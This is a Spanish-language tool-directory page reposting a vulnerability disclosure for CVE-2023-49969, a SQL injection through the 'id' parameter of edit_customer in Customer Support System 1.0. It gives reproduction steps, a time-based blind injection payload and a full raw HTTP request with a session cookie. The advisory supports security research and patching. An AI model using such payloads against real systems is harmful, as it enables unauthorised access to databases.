Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-49969 — Sistema de soporte al cliente 1.0 - Vulnerabilidad de inyección SQL en edit_customer a través del parámetro de URL "id" | Kitploit
Herramientas/GitHubGitHub/geraldoalcantara/cve-2023-49969
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónSeguridad de Bases de Datos
GitHubgeraldoalcantara/cve-2023-49969

CVE-2023-49969

Sistema de soporte al cliente 1.0 - Vulnerabilidad de inyección SQL en edit_customer a través del parámetro de URL "id"

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-49969

Customer Support System 1.0 - Vulnerabilidad de Inyección SQL en edit_customer a través del parámetro URL "id"

Descripción: Existe una vulnerabilidad de Inyección SQL en la versión 1 del Customer Support System. Un atacante con intenciones maliciosas puede ejecutar comandos SQL en la base de datos MySQL manipulando el parámetro URL 'id' al editar un cliente.

Versión del producto vulnerable: Customer Support System 1.0
Autor del CVE: Geraldo Alcântara
Fecha: 28/11/2023
Confirmado el: 19/12/2023
CVE: CVE-2023-49969
Probado en: Windows

Pasos para reproducir:

1- Inicie sesión en la aplicación.
2- Navegue a la página customer_list, haga clic en el botón "Action" y seleccione "Edit".
3- Se pasará el parámetro 'id', lo que permite la inserción de una carga útil maliciosa.
payload: (select*from(select(sleep(5)))a)

Petición

root@kitploit:~
GET /customer_support/index.php?page=edit_customer&id=(select*from(select(sleep(5)))a HTTP/1.1
Host: 192.168.68.182
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://192.168.68.182/customer_support/index.php?page=customer_list
Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n
Upgrade-Insecure-Requests: 1

Descubridor(es)/Créditos:
Geraldo Alcântara

Descargar herramienta